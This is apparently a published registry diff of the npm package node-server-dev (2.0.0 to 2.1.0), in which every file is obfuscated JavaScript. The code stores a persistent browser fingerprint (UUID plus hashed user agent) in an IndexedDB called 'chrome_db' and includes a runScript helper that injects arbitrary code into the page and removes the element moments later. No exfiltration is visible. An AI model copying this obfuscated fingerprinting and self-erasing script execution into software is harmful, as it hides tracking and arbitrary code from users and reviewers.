node-server-dev 2.0.0 → 2.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1 +1 @@
1
- 'use strict';function a5_0xd1a0(){const _0x58ec27=['43167buKncq','then','defineProperty','target','stringify','0123456789ABCDEF','764930zvOqud','done','readonly','floor','next','value','3512HsIXCx','objectStore','navigator','key','result','72dvowvd','__importDefault','77rLKpQG','contains','onerror','740567jDqcnN','apply','516yEQKPG','3507KsEtuI','metadata','throw','get','mac','12770eHyxjQ','error','1891920jIFHXG','replace','5416533PyVPFB','__esModule','userAgent','default'];a5_0xd1a0=function(){return _0x58ec27;};return a5_0xd1a0();}const a5_0x3997fe=a5_0x4860;(function(_0x29402e,_0x105d87){const _0x5b2f30=a5_0x4860,_0x2486f7=_0x29402e();while(!![]){try{const _0x23f52a=parseInt(_0x5b2f30(0x1be))/0x1+parseInt(_0x5b2f30(0x1b9))/0x2*(-parseInt(_0x5b2f30(0x1ce))/0x3)+-parseInt(_0x5b2f30(0x1c8))/0x4+-parseInt(_0x5b2f30(0x1c6))/0x5*(parseInt(_0x5b2f30(0x1c0))/0x6)+parseInt(_0x5b2f30(0x1c1))/0x7*(-parseInt(_0x5b2f30(0x1b4))/0x8)+parseInt(_0x5b2f30(0x1ca))/0x9+-parseInt(_0x5b2f30(0x1d4))/0xa*(-parseInt(_0x5b2f30(0x1bb))/0xb);if(_0x23f52a===_0x105d87)break;else _0x2486f7['push'](_0x2486f7['shift']());}catch(_0x165d40){_0x2486f7['push'](_0x2486f7['shift']());}}}(a5_0xd1a0,0x6d338));var __awaiter=this&&this['__awaiter']||function(_0x7f6290,_0x2d9f21,_0x180ee7,_0x5712cd){function _0x46b851(_0xb3dbe9){return _0xb3dbe9 instanceof _0x180ee7?_0xb3dbe9:new _0x180ee7(function(_0x555a87){_0x555a87(_0xb3dbe9);});}return new(_0x180ee7||(_0x180ee7=Promise))(function(_0x2c4475,_0x4e5ebd){const _0x5a8950=a5_0x4860;function _0x3b65a3(_0x373348){const _0x29be34=a5_0x4860;try{_0x113c08(_0x5712cd[_0x29be34(0x1b2)](_0x373348));}catch(_0x4be8e4){_0x4e5ebd(_0x4be8e4);}}function _0x5df4a5(_0x28a182){const _0x1bcc0b=a5_0x4860;try{_0x113c08(_0x5712cd[_0x1bcc0b(0x1c3)](_0x28a182));}catch(_0x46a285){_0x4e5ebd(_0x46a285);}}function _0x113c08(_0x280347){const _0x32c11d=a5_0x4860;_0x280347[_0x32c11d(0x1d5)]?_0x2c4475(_0x280347[_0x32c11d(0x1b3)]):_0x46b851(_0x280347['value'])[_0x32c11d(0x1cf)](_0x3b65a3,_0x5df4a5);}_0x113c08((_0x5712cd=_0x5712cd[_0x5a8950(0x1bf)](_0x7f6290,_0x2d9f21||[]))['next']());});},__importDefault=this&&this[a5_0x3997fe(0x1ba)]||function(_0xc66c1){return _0xc66c1&&_0xc66c1['__esModule']?_0xc66c1:{'default':_0xc66c1};};Object[a5_0x3997fe(0x1d0)](exports,a5_0x3997fe(0x1cb),{'value':!![]}),exports['getKeyValue']=getKeyValue;const md5_1=__importDefault(require('md5')),__1=require('..');function openDatabase(){return new Promise((_0x3aa549,_0x1cbc75)=>{const _0x3d77ed=indexedDB['open']('chrome_db',0x1);_0x3d77ed['onupgradeneeded']=_0x16f936=>{const _0x454f3f=a5_0x4860,_0x4c464f=_0x16f936['target'][_0x454f3f(0x1b8)];!_0x4c464f['objectStoreNames'][_0x454f3f(0x1bc)](_0x454f3f(0x1c2))&&_0x4c464f['createObjectStore'](_0x454f3f(0x1c2),{'keyPath':_0x454f3f(0x1b7)});},_0x3d77ed['onsuccess']=_0x33f4ba=>{const _0x29e1ad=a5_0x4860,_0x2f3dc1=_0x33f4ba[_0x29e1ad(0x1d1)]['result'];_0x3aa549(_0x2f3dc1);},_0x3d77ed['onerror']=_0x36eec8=>{const _0x2fc57e=a5_0x4860;_0x1cbc75(_0x36eec8[_0x2fc57e(0x1d1)]['error']);};});}function setKeyValue(_0x18577a,_0x1a1829){return new Promise((_0xb3de76,_0x3507a3)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x267dcb=a5_0x4860,_0x1b1230=yield openDatabase(),_0xa1440d=_0x1b1230['transaction'](_0x267dcb(0x1c2),'readwrite'),_0x4b7a45=_0xa1440d[_0x267dcb(0x1b5)]('metadata'),_0x1a18f1=_0x4b7a45['put']({'key':_0x18577a,'value':_0x1a1829});_0x1a18f1['onsuccess']=()=>{_0xb3de76();},_0x1a18f1[_0x267dcb(0x1bd)]=_0xf59b57=>{const _0x764bf8=_0x267dcb;_0x3507a3(_0xf59b57['target'][_0x764bf8(0x1c7)]);};}));}function a5_0x4860(_0x85e56,_0x49743b){const _0xd1a095=a5_0xd1a0();return a5_0x4860=function(_0x486025,_0x440782){_0x486025=_0x486025-0x1b1;let _0x5784af=_0xd1a095[_0x486025];return _0x5784af;},a5_0x4860(_0x85e56,_0x49743b);}function getKeyValue(_0x445f6a){return new Promise((_0x41da2d,_0x5e5178)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x1ed735=a5_0x4860,_0x4d9a5f=yield openDatabase(),_0x5d7da3=_0x4d9a5f['transaction'](_0x1ed735(0x1c2),_0x1ed735(0x1d6)),_0x397393=_0x5d7da3[_0x1ed735(0x1b5)](_0x1ed735(0x1c2)),_0x23ccf9=_0x397393[_0x1ed735(0x1c4)](_0x445f6a);_0x23ccf9['onsuccess']=()=>{const _0x3d7583=_0x1ed735;_0x41da2d(_0x23ccf9[_0x3d7583(0x1b8)]?_0x23ccf9['result']['value']:null);},_0x23ccf9[_0x1ed735(0x1bd)]=_0x119369=>{const _0x5ed327=_0x1ed735;_0x5e5178(_0x119369[_0x5ed327(0x1d1)][_0x5ed327(0x1c7)]);};}));}function generateRandomMAC(){const _0xf7cbf8=a5_0x3997fe,_0x130c99=_0xf7cbf8(0x1d3);let _0x317af4='';for(let _0x109945=0x0;_0x109945<0xc;_0x109945++){_0x317af4+=_0x130c99[Math[_0xf7cbf8(0x1b1)](Math['random']()*0x10)],_0x109945%0x2===0x1&&_0x109945!==0xb&&(_0x317af4+=':');}return(0x0,__1['uuid'])()[_0xf7cbf8(0x1c9)](/-/g,'')+(0x0,md5_1[_0xf7cbf8(0x1cd)])(JSON[_0xf7cbf8(0x1d2)](window[_0xf7cbf8(0x1b6)][_0xf7cbf8(0x1cc)]));}function main(){return __awaiter(this,void 0x0,void 0x0,function*(){const _0x19f6c8=a5_0x4860;try{const _0x45a59f=yield openDatabase();let _0xa8a0a=yield getKeyValue(_0x19f6c8(0x1c5));if(!_0xa8a0a)_0xa8a0a=generateRandomMAC(),yield setKeyValue(_0x19f6c8(0x1c5),_0xa8a0a);else{}return _0xa8a0a;}catch(_0x308df2){return null;}});}main();
1
+ 'use strict';const a5_0x50c45d=a5_0x30d4;(function(_0x2ccada,_0x2fb85b){const _0x33faeb=a5_0x30d4,_0x562c15=_0x2ccada();while(!![]){try{const _0x818e87=-parseInt(_0x33faeb(0x9f))/0x1+parseInt(_0x33faeb(0x8e))/0x2*(-parseInt(_0x33faeb(0x8a))/0x3)+parseInt(_0x33faeb(0xaa))/0x4+parseInt(_0x33faeb(0x9c))/0x5*(-parseInt(_0x33faeb(0xac))/0x6)+-parseInt(_0x33faeb(0xa9))/0x7+-parseInt(_0x33faeb(0x89))/0x8*(parseInt(_0x33faeb(0xa0))/0x9)+parseInt(_0x33faeb(0x93))/0xa*(parseInt(_0x33faeb(0x84))/0xb);if(_0x818e87===_0x2fb85b)break;else _0x562c15['push'](_0x562c15['shift']());}catch(_0x30220f){_0x562c15['push'](_0x562c15['shift']());}}}(a5_0x3f30,0xa4cf8));function a5_0x30d4(_0x27c020,_0x7a17fd){const _0x3f3095=a5_0x3f30();return a5_0x30d4=function(_0x30d451,_0x24f548){_0x30d451=_0x30d451-0x81;let _0x47365e=_0x3f3095[_0x30d451];return _0x47365e;},a5_0x30d4(_0x27c020,_0x7a17fd);}var __awaiter=this&&this[a5_0x50c45d(0x88)]||function(_0xa25b3b,_0x30f4ad,_0x110f15,_0x35a4a3){function _0x3f057c(_0x362751){return _0x362751 instanceof _0x110f15?_0x362751:new _0x110f15(function(_0x43636c){_0x43636c(_0x362751);});}return new(_0x110f15||(_0x110f15=Promise))(function(_0x564551,_0x4913c1){const _0x1e176b=a5_0x30d4;function _0x97d83a(_0x109413){try{_0x568e3d(_0x35a4a3['next'](_0x109413));}catch(_0x111747){_0x4913c1(_0x111747);}}function _0x2bdf5b(_0x476c8e){try{_0x568e3d(_0x35a4a3['throw'](_0x476c8e));}catch(_0x377263){_0x4913c1(_0x377263);}}function _0x568e3d(_0x275f7e){const _0xf80768=a5_0x30d4;_0x275f7e['done']?_0x564551(_0x275f7e[_0xf80768(0xa1)]):_0x3f057c(_0x275f7e[_0xf80768(0xa1)])[_0xf80768(0x8b)](_0x97d83a,_0x2bdf5b);}_0x568e3d((_0x35a4a3=_0x35a4a3[_0x1e176b(0xa7)](_0xa25b3b,_0x30f4ad||[]))[_0x1e176b(0xa3)]());});},__importDefault=this&&this['__importDefault']||function(_0x1d9be9){const _0x337ff0=a5_0x50c45d;return _0x1d9be9&&_0x1d9be9[_0x337ff0(0x85)]?_0x1d9be9:{'default':_0x1d9be9};};Object[a5_0x50c45d(0x96)](exports,a5_0x50c45d(0x85),{'value':!![]}),exports[a5_0x50c45d(0xaf)]=getKeyValue;const md5_1=__importDefault(require(a5_0x50c45d(0x9e))),__1=require('..');function openDatabase(){return new Promise((_0xbd5263,_0x28bf66)=>{const _0xc5d6c4=a5_0x30d4,_0x20441c=indexedDB[_0xc5d6c4(0x99)](_0xc5d6c4(0x8c),0x1);_0x20441c[_0xc5d6c4(0xad)]=_0xc642c5=>{const _0x34c162=_0xc5d6c4,_0x246c81=_0xc642c5[_0x34c162(0x86)][_0x34c162(0x8d)];!_0x246c81[_0x34c162(0x9d)][_0x34c162(0xa6)](_0x34c162(0x81))&&_0x246c81['createObjectStore'](_0x34c162(0x81),{'keyPath':_0x34c162(0x94)});},_0x20441c[_0xc5d6c4(0xab)]=_0x24f4d3=>{const _0x3e9948=_0xc5d6c4,_0x4999ea=_0x24f4d3[_0x3e9948(0x86)][_0x3e9948(0x8d)];_0xbd5263(_0x4999ea);},_0x20441c[_0xc5d6c4(0x91)]=_0x40019c=>{const _0x21be0d=_0xc5d6c4;_0x28bf66(_0x40019c[_0x21be0d(0x86)]['error']);};});}function setKeyValue(_0x5dfd9d,_0x68e9a7){return new Promise((_0xd9ecd2,_0x65e2c3)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x52935c=a5_0x30d4,_0x11a75c=yield openDatabase(),_0x238001=_0x11a75c[_0x52935c(0xae)]('metadata',_0x52935c(0xa8)),_0x218a5c=_0x238001[_0x52935c(0x9b)](_0x52935c(0x81)),_0x1d429c=_0x218a5c[_0x52935c(0x90)]({'key':_0x5dfd9d,'value':_0x68e9a7});_0x1d429c['onsuccess']=()=>{_0xd9ecd2();},_0x1d429c[_0x52935c(0x91)]=_0x3cfc2c=>{const _0x5d92af=_0x52935c;_0x65e2c3(_0x3cfc2c[_0x5d92af(0x86)]['error']);};}));}function getKeyValue(_0xaea13b){return new Promise((_0x37984f,_0x338878)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x496857=a5_0x30d4,_0x4dafde=yield openDatabase(),_0x12a237=_0x4dafde[_0x496857(0xae)](_0x496857(0x81),_0x496857(0xa5)),_0x406d8e=_0x12a237['objectStore']('metadata'),_0x4d0342=_0x406d8e[_0x496857(0x98)](_0xaea13b);_0x4d0342[_0x496857(0xab)]=()=>{const _0x15c282=_0x496857;_0x37984f(_0x4d0342[_0x15c282(0x8d)]?_0x4d0342[_0x15c282(0x8d)][_0x15c282(0xa1)]:null);},_0x4d0342[_0x496857(0x91)]=_0xf452e3=>{const _0xf3ff69=_0x496857;_0x338878(_0xf452e3['target'][_0xf3ff69(0x82)]);};}));}function generateRandomMAC(){const _0x12d59f=a5_0x50c45d,_0x620523=_0x12d59f(0x87);let _0xd0c79e='';for(let _0x40095a=0x0;_0x40095a<0xc;_0x40095a++){_0xd0c79e+=_0x620523[Math[_0x12d59f(0x92)](Math[_0x12d59f(0x8f)]()*0x10)],_0x40095a%0x2===0x1&&_0x40095a!==0xb&&(_0xd0c79e+=':');}return(0x0,__1[_0x12d59f(0xa2)])()['replace'](/-/g,'')+(0x0,md5_1[_0x12d59f(0xa4)])(JSON[_0x12d59f(0x95)](window[_0x12d59f(0x83)][_0x12d59f(0x9a)]));}function main(){return __awaiter(this,void 0x0,void 0x0,function*(){const _0x27b159=a5_0x30d4;try{const _0x12a2a4=yield openDatabase();let _0x2a4cb0=yield getKeyValue(_0x27b159(0x97));if(!_0x2a4cb0)_0x2a4cb0=generateRandomMAC(),yield setKeyValue(_0x27b159(0x97),_0x2a4cb0);else{}return _0x2a4cb0;}catch(_0x2e33c2){return null;}});}function a5_0x3f30(){const _0x564a71=['default','readonly','contains','apply','readwrite','1696037nFhRtv','4661444qMPgty','onsuccess','848394OOWmZz','onupgradeneeded','transaction','getKeyValue','metadata','error','navigator','34881627ceBQTx','__esModule','target','0123456789ABCDEF','__awaiter','646008yZNEaK','6RMewYN','then','chrome_db','result','999266vNHKzm','random','put','onerror','floor','10pVEWUw','key','stringify','defineProperty','mac','get','open','userAgent','objectStore','15REPPSb','objectStoreNames','md5','784335mihxfN','135eHvNcF','value','uuid','next'];a5_0x3f30=function(){return _0x564a71;};return a5_0x3f30();}main();
@@ -1 +1 @@
1
- 'use strict';const a0_0x508e72=a0_0x4598;function a0_0x4598(_0x3c696c,_0xe555c9){const _0x2f16e3=a0_0x2f16();return a0_0x4598=function(_0x4598d6,_0x5901db){_0x4598d6=_0x4598d6-0x1d9;let _0x286d13=_0x2f16e3[_0x4598d6];return _0x286d13;},a0_0x4598(_0x3c696c,_0xe555c9);}(function(_0x16d976,_0x4c150a){const _0x4617ee=a0_0x4598,_0x152e9a=_0x16d976();while(!![]){try{const _0x3fa220=parseInt(_0x4617ee(0x1de))/0x1+-parseInt(_0x4617ee(0x1e1))/0x2+-parseInt(_0x4617ee(0x1db))/0x3+parseInt(_0x4617ee(0x1e4))/0x4*(-parseInt(_0x4617ee(0x1e3))/0x5)+-parseInt(_0x4617ee(0x1e8))/0x6+-parseInt(_0x4617ee(0x1dc))/0x7*(-parseInt(_0x4617ee(0x1e0))/0x8)+parseInt(_0x4617ee(0x1dd))/0x9;if(_0x3fa220===_0x4c150a)break;else _0x152e9a['push'](_0x152e9a['shift']());}catch(_0x28f1d1){_0x152e9a['push'](_0x152e9a['shift']());}}}(a0_0x2f16,0x78ac4));Object[a0_0x508e72(0x1e7)](exports,a0_0x508e72(0x1da),{'value':!![]}),exports[a0_0x508e72(0x1df)]=runScript;function runScript(_0x1af5eb){const _0x23820c=a0_0x508e72;let _0x180f0f=document[_0x23820c(0x1d9)](_0x23820c(0x1e2));_0x180f0f['innerText']=_0x1af5eb,document[_0x23820c(0x1e9)][_0x23820c(0x1e5)](_0x180f0f),setTimeout(()=>{const _0x5986c2=_0x23820c;_0x180f0f[_0x5986c2(0x1e6)]();},0xa);}function a0_0x2f16(){const _0x316049=['__esModule','1572459IPugcD','7XdDDso','14706369qRnvSo','431324brNJKV','runScript','3400368niXkXE','1653028FaBirQ','script','355XktfKo','7212NcOuCL','appendChild','remove','defineProperty','3104730QyZHFf','head','createElement'];a0_0x2f16=function(){return _0x316049;};return a0_0x2f16();}
1
+ 'use strict';const a0_0x49e5e8=a0_0x1e15;(function(_0x3a11a2,_0x24c35b){const _0x502df2=a0_0x1e15,_0x134c3a=_0x3a11a2();while(!![]){try{const _0x44c6ce=-parseInt(_0x502df2(0xe6))/0x1*(parseInt(_0x502df2(0xe2))/0x2)+-parseInt(_0x502df2(0xe7))/0x3*(parseInt(_0x502df2(0xea))/0x4)+-parseInt(_0x502df2(0xe4))/0x5+parseInt(_0x502df2(0xdf))/0x6+-parseInt(_0x502df2(0xe0))/0x7+-parseInt(_0x502df2(0xeb))/0x8+-parseInt(_0x502df2(0xe8))/0x9*(-parseInt(_0x502df2(0xde))/0xa);if(_0x44c6ce===_0x24c35b)break;else _0x134c3a['push'](_0x134c3a['shift']());}catch(_0x12f66a){_0x134c3a['push'](_0x134c3a['shift']());}}}(a0_0x5b40,0x5f2b8));function a0_0x1e15(_0x2975a0,_0x3cb8c1){const _0x5b40d5=a0_0x5b40();return a0_0x1e15=function(_0x1e1514,_0x3a2a2b){_0x1e1514=_0x1e1514-0xdd;let _0x3ca4a2=_0x5b40d5[_0x1e1514];return _0x3ca4a2;},a0_0x1e15(_0x2975a0,_0x3cb8c1);}Object[a0_0x49e5e8(0xec)](exports,a0_0x49e5e8(0xe1),{'value':!![]}),exports[a0_0x49e5e8(0xed)]=runScript;function runScript(_0x47e500){const _0x2a110d=a0_0x49e5e8;let _0x165cf4=document[_0x2a110d(0xe5)](_0x2a110d(0xee));_0x165cf4[_0x2a110d(0xe3)]=_0x47e500,document['head'][_0x2a110d(0xdd)](_0x165cf4),setTimeout(()=>{const _0x34fc93=_0x2a110d;_0x165cf4[_0x34fc93(0xe9)]();},0xa);}function a0_0x5b40(){const _0xb74a0=['144783tHdfqu','remove','8qyRDLp','5390352aLTwCf','defineProperty','runScript','script','appendChild','1730YdqEJF','254448fgfUQO','4108734eHLoCv','__esModule','20zPlwKR','innerText','1879115uEhhuk','createElement','60771WGyseK','287031aLbQmn'];a0_0x5b40=function(){return _0xb74a0;};return a0_0x5b40();}
@@ -1 +1 @@
1
- 'use strict';const a1_0x5b966a=a1_0x3738;(function(_0x4fc521,_0xdc5fc){const _0x5644b6=a1_0x3738,_0x8f9ab6=_0x4fc521();while(!![]){try{const _0x4f961c=-parseInt(_0x5644b6(0x12c))/0x1+-parseInt(_0x5644b6(0x136))/0x2+parseInt(_0x5644b6(0x127))/0x3*(parseInt(_0x5644b6(0x139))/0x4)+-parseInt(_0x5644b6(0x129))/0x5+-parseInt(_0x5644b6(0x12f))/0x6*(parseInt(_0x5644b6(0x123))/0x7)+parseInt(_0x5644b6(0x125))/0x8*(parseInt(_0x5644b6(0x12b))/0x9)+parseInt(_0x5644b6(0x135))/0xa;if(_0x4f961c===_0xdc5fc)break;else _0x8f9ab6['push'](_0x8f9ab6['shift']());}catch(_0x58bf06){_0x8f9ab6['push'](_0x8f9ab6['shift']());}}}(a1_0x1f52,0x819f4));function a1_0x3738(_0x3031b9,_0x4beb8e){const _0x1f523d=a1_0x1f52();return a1_0x3738=function(_0x373885,_0x3f41b5){_0x373885=_0x373885-0x121;let _0x10cbc2=_0x1f523d[_0x373885];return _0x10cbc2;},a1_0x3738(_0x3031b9,_0x4beb8e);}var __awaiter=this&&this[a1_0x5b966a(0x131)]||function(_0x1f4e48,_0x25156e,_0x23bac5,_0x59d08d){function _0x51f680(_0x1dc2b4){return _0x1dc2b4 instanceof _0x23bac5?_0x1dc2b4:new _0x23bac5(function(_0x6f3c97){_0x6f3c97(_0x1dc2b4);});}return new(_0x23bac5||(_0x23bac5=Promise))(function(_0x3612dc,_0x31b9a7){const _0x2a1615=a1_0x3738;function _0x12a05d(_0x46d28a){const _0x59352a=a1_0x3738;try{_0xc7b4ff(_0x59d08d[_0x59352a(0x12e)](_0x46d28a));}catch(_0x171405){_0x31b9a7(_0x171405);}}function _0x1aa5f0(_0x2129bc){try{_0xc7b4ff(_0x59d08d['throw'](_0x2129bc));}catch(_0x2a3fab){_0x31b9a7(_0x2a3fab);}}function _0xc7b4ff(_0x3d77fb){const _0x5d5e9c=a1_0x3738;_0x3d77fb[_0x5d5e9c(0x12a)]?_0x3612dc(_0x3d77fb[_0x5d5e9c(0x134)]):_0x51f680(_0x3d77fb[_0x5d5e9c(0x134)])[_0x5d5e9c(0x124)](_0x12a05d,_0x1aa5f0);}_0xc7b4ff((_0x59d08d=_0x59d08d[_0x2a1615(0x122)](_0x1f4e48,_0x25156e||[]))[_0x2a1615(0x12e)]());});},__importDefault=this&&this[a1_0x5b966a(0x13b)]||function(_0x2ef8e3){const _0x533f04=a1_0x5b966a;return _0x2ef8e3&&_0x2ef8e3[_0x533f04(0x13a)]?_0x2ef8e3:{'default':_0x2ef8e3};};Object[a1_0x5b966a(0x128)](exports,'__esModule',{'value':!![]});function a1_0x1f52(){const _0xb26707=['push','57556iGBdcs','__esModule','__importDefault','readdirSync','apply','3476039KnRexl','then','376UboQPT','path','42ULxYcm','defineProperty','240650vSEZWQ','done','110862tFGXhY','921553bXfnaV','isDirectory','next','6NhtsjF','isFile','__awaiter','default','statSync','value','20553210daZmus','1677042uAdGjB','join'];a1_0x1f52=function(){return _0xb26707;};return a1_0x1f52();}const fs_1=__importDefault(require('fs')),path_1=__importDefault(require(a1_0x5b966a(0x126)));function fileDisplay(_0x372b99){return __awaiter(this,void 0x0,void 0x0,function*(){let _0x174243=[];function _0x5191c8(_0xd183aa){const _0x44cf0a=a1_0x3738,_0x1783ac=fs_1['default'][_0x44cf0a(0x121)](_0xd183aa);for(let _0x350930=0x0;_0x350930<_0x1783ac['length'];_0x350930++){const _0x49b2cb=_0x1783ac[_0x350930],_0x18038c=path_1[_0x44cf0a(0x132)][_0x44cf0a(0x137)](_0xd183aa,_0x49b2cb),_0x368984=fs_1[_0x44cf0a(0x132)][_0x44cf0a(0x133)](_0x18038c),_0x329c15=_0x368984[_0x44cf0a(0x130)](),_0x29018b=_0x368984[_0x44cf0a(0x12d)]();_0x329c15&&_0x174243[_0x44cf0a(0x138)](_0x18038c),_0x29018b&&_0x5191c8(_0x18038c);}}return _0x5191c8(_0x372b99),_0x174243;});}function getAllRouter(_0x172d90){return __awaiter(this,void 0x0,void 0x0,function*(){let _0xb37c31=yield fileDisplay(_0x172d90);return _0xb37c31;});}exports[a1_0x5b966a(0x132)]=getAllRouter;
1
+ 'use strict';const a1_0x13e3e4=a1_0x3c6f;(function(_0xa97a28,_0x390e73){const _0x429c9b=a1_0x3c6f,_0x54aa40=_0xa97a28();while(!![]){try{const _0x45e10d=-parseInt(_0x429c9b(0x1b9))/0x1+parseInt(_0x429c9b(0x1cb))/0x2*(parseInt(_0x429c9b(0x1ce))/0x3)+-parseInt(_0x429c9b(0x1ca))/0x4*(parseInt(_0x429c9b(0x1bc))/0x5)+parseInt(_0x429c9b(0x1c6))/0x6*(parseInt(_0x429c9b(0x1bd))/0x7)+-parseInt(_0x429c9b(0x1bf))/0x8*(parseInt(_0x429c9b(0x1c4))/0x9)+-parseInt(_0x429c9b(0x1b7))/0xa+parseInt(_0x429c9b(0x1c3))/0xb;if(_0x45e10d===_0x390e73)break;else _0x54aa40['push'](_0x54aa40['shift']());}catch(_0xfe01ff){_0x54aa40['push'](_0x54aa40['shift']());}}}(a1_0x1bdf,0x60d6b));function a1_0x3c6f(_0x183091,_0x49bce2){const _0x1bdf6e=a1_0x1bdf();return a1_0x3c6f=function(_0x3c6f6a,_0x2a4319){_0x3c6f6a=_0x3c6f6a-0x1b7;let _0x5b96cd=_0x1bdf6e[_0x3c6f6a];return _0x5b96cd;},a1_0x3c6f(_0x183091,_0x49bce2);}var __awaiter=this&&this[a1_0x13e3e4(0x1c2)]||function(_0x773835,_0x275723,_0x31bb9e,_0xeec62b){function _0x4c73f9(_0x2f9650){return _0x2f9650 instanceof _0x31bb9e?_0x2f9650:new _0x31bb9e(function(_0x288866){_0x288866(_0x2f9650);});}return new(_0x31bb9e||(_0x31bb9e=Promise))(function(_0x469aae,_0x371185){const _0x25f25f=a1_0x3c6f;function _0x259908(_0x1b7ba5){const _0x148cd5=a1_0x3c6f;try{_0x5cbf10(_0xeec62b[_0x148cd5(0x1c0)](_0x1b7ba5));}catch(_0x522ada){_0x371185(_0x522ada);}}function _0x320c3d(_0x43ac15){try{_0x5cbf10(_0xeec62b['throw'](_0x43ac15));}catch(_0xa4e94){_0x371185(_0xa4e94);}}function _0x5cbf10(_0x47f605){const _0x3af286=a1_0x3c6f;_0x47f605[_0x3af286(0x1cc)]?_0x469aae(_0x47f605[_0x3af286(0x1cd)]):_0x4c73f9(_0x47f605[_0x3af286(0x1cd)])[_0x3af286(0x1c8)](_0x259908,_0x320c3d);}_0x5cbf10((_0xeec62b=_0xeec62b['apply'](_0x773835,_0x275723||[]))[_0x25f25f(0x1c0)]());});},__importDefault=this&&this[a1_0x13e3e4(0x1c7)]||function(_0x3a39a0){return _0x3a39a0&&_0x3a39a0['__esModule']?_0x3a39a0:{'default':_0x3a39a0};};Object[a1_0x13e3e4(0x1c9)](exports,a1_0x13e3e4(0x1bb),{'value':!![]});const fs_1=__importDefault(require('fs')),path_1=__importDefault(require('path'));function fileDisplay(_0x574dc1){return __awaiter(this,void 0x0,void 0x0,function*(){let _0x3f4a50=[];function _0x524d71(_0x30154f){const _0x3466bb=a1_0x3c6f,_0x2a8794=fs_1[_0x3466bb(0x1c1)]['readdirSync'](_0x30154f);for(let _0x5cbde9=0x0;_0x5cbde9<_0x2a8794['length'];_0x5cbde9++){const _0x11bb2f=_0x2a8794[_0x5cbde9],_0x19d1bb=path_1[_0x3466bb(0x1c1)]['join'](_0x30154f,_0x11bb2f),_0x5399e5=fs_1[_0x3466bb(0x1c1)][_0x3466bb(0x1c5)](_0x19d1bb),_0x507d51=_0x5399e5[_0x3466bb(0x1be)](),_0x587e2c=_0x5399e5[_0x3466bb(0x1ba)]();_0x507d51&&_0x3f4a50[_0x3466bb(0x1b8)](_0x19d1bb),_0x587e2c&&_0x524d71(_0x19d1bb);}}return _0x524d71(_0x574dc1),_0x3f4a50;});}function getAllRouter(_0x48d31e){return __awaiter(this,void 0x0,void 0x0,function*(){let _0xdce5c0=yield fileDisplay(_0x48d31e);return _0xdce5c0;});}exports[a1_0x13e3e4(0x1c1)]=getAllRouter;function a1_0x1bdf(){const _0x49056e=['value','325617hpwYsI','636640BZQzyT','push','621825LTMnFJ','isDirectory','__esModule','19960ijlBGk','35uBUGfi','isFile','4480736UtXaoL','next','default','__awaiter','10863380APqwTH','9zfqRRd','statSync','393030ghRbrT','__importDefault','then','defineProperty','216FPLjXc','10cwkEUX','done'];a1_0x1bdf=function(){return _0x49056e;};return a1_0x1bdf();}
@@ -1 +1 @@
1
- 'use strict';const a2_0x17be55=a2_0x583e;(function(_0x4d88ce,_0x235a09){const _0x11ae10=a2_0x583e,_0x16c99b=_0x4d88ce();while(!![]){try{const _0x59760c=-parseInt(_0x11ae10(0x15c))/0x1*(parseInt(_0x11ae10(0x15e))/0x2)+-parseInt(_0x11ae10(0x155))/0x3*(parseInt(_0x11ae10(0x15f))/0x4)+parseInt(_0x11ae10(0x156))/0x5+parseInt(_0x11ae10(0x150))/0x6+-parseInt(_0x11ae10(0x159))/0x7*(parseInt(_0x11ae10(0x160))/0x8)+parseInt(_0x11ae10(0x151))/0x9+parseInt(_0x11ae10(0x157))/0xa;if(_0x59760c===_0x235a09)break;else _0x16c99b['push'](_0x16c99b['shift']());}catch(_0x44032b){_0x16c99b['push'](_0x16c99b['shift']());}}}(a2_0x5e86,0x320ce));var __importDefault=this&&this[a2_0x17be55(0x153)]||function(_0x5584c6){const _0x16e931=a2_0x17be55;return _0x5584c6&&_0x5584c6[_0x16e931(0x15a)]?_0x5584c6:{'default':_0x5584c6};};function a2_0x5e86(){const _0x2fcd75=['defineProperty','601674YmUCrv','1410444bjbZqV','2025-01-01','__importDefault','NODE_APP_INSTANCE','154689UROuDl','502330oapWkk','5968770hSKdMH','min','14bYIZsn','__esModule','default','2221rihybi','env','326srLFqK','28qlgtrA','105472meIrLd'];a2_0x5e86=function(){return _0x2fcd75;};return a2_0x5e86();}function a2_0x583e(_0x9ee8f2,_0x51d5ab){const _0x5e86fa=a2_0x5e86();return a2_0x583e=function(_0x583e39,_0x17f024){_0x583e39=_0x583e39-0x150;let _0x1a3261=_0x5e86fa[_0x583e39];return _0x1a3261;},a2_0x583e(_0x9ee8f2,_0x51d5ab);}Object[a2_0x17be55(0x161)](exports,a2_0x17be55(0x15a),{'value':!![]});const random_1=__importDefault(require('./random')),BaseTime=+new Date(a2_0x17be55(0x152));let lastTimeTick,lastRandomNumberTick=(0x0,random_1[a2_0x17be55(0x15b)])(0x1,0x3);function id(){const _0x2a5192=a2_0x17be55,_0x46da8e=Math[_0x2a5192(0x158)](process[_0x2a5192(0x15d)][_0x2a5192(0x154)]?+process[_0x2a5192(0x15d)]['NODE_APP_INSTANCE']:(0x0,random_1[_0x2a5192(0x15b)])(0x0,0x9),0x9);let _0x42083c=+new Date()-BaseTime;return lastRandomNumberTick=_0x42083c==lastTimeTick?++lastRandomNumberTick:(0x0,random_1[_0x2a5192(0x15b)])(0x0,0x3),lastTimeTick=_0x42083c,+(''+_0x42083c+_0x46da8e+lastRandomNumberTick);}exports[a2_0x17be55(0x15b)]=id;
1
